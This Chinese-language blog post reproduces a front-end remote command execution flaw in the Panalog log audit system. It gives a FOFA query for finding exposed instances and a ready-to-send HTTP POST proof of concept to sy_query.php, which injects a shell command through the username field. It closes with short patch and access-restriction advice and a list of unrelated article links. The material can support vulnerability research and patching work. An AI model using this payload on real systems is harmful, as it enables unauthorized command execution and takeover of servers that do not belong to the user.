当前位置: 首页 > article >正文

Panalog 日志审计系统 前台RCE漏洞复现

article 2025/3/10 15:11:47

0x01 产品简介

 Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。

0x02 漏洞概述

 Panalog日志审计系统 sy_query.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。

0x03 复现环境

FOFA:app="Panabit-Panalog"

0x04 漏洞复现

PoC

POST /account/sy_query.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=;whoami>1.txt

查看命令执行结果

0x05 修复建议 

⼚商已发布了漏洞修复程序,请及时关注更新: https://www.panabit.com

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。


http://www.kler.cn/a/152295.html

相关文章:

  • MySQL三大日志详细总结(redo log undo log binlog)
  • Linux信号超详细剖析
  • Linux命令--根据端口号查看进程号(PID)
  • AKConv:具有任意采样形状和任意数目参数的卷积核
  • 编译企业微信会话内容存档PHP版SDK扩展
  • 【超全】C++速查手册:面向对象与继承多态
  • HarmonyOS4.0 ArkUI组件
  • 【软件测试】白盒测试和黑盒测试
  • 从零开始部署一个网站详细图文教程——腾讯云的服务器、SSL证书,阿里云的域名,七牛云的对象存储、CDN等
  • 【JavaSE】集合(学习笔记)
  • Redis的高可用模式
  • 11.30固定成本,完全竞争市场,无差异曲线,帕累托最优
  • 上门服务系统|东郊到家软件提供高效服务的科技支柱
  • Java基本数据类型
  • 测试相关-面试高频
  • 【Web】UUCTF 2022 新生赛 个人复现
  • 最新Midjourney绘画提示词Prompt
  • 面试题库之JAVA基础篇(三)
  • 2017年五一杯数学建模B题自媒体时代的消息传播问题解题全过程文档及程序
  • [c++]—string类___深度学习string标准库成员函数与非成员函数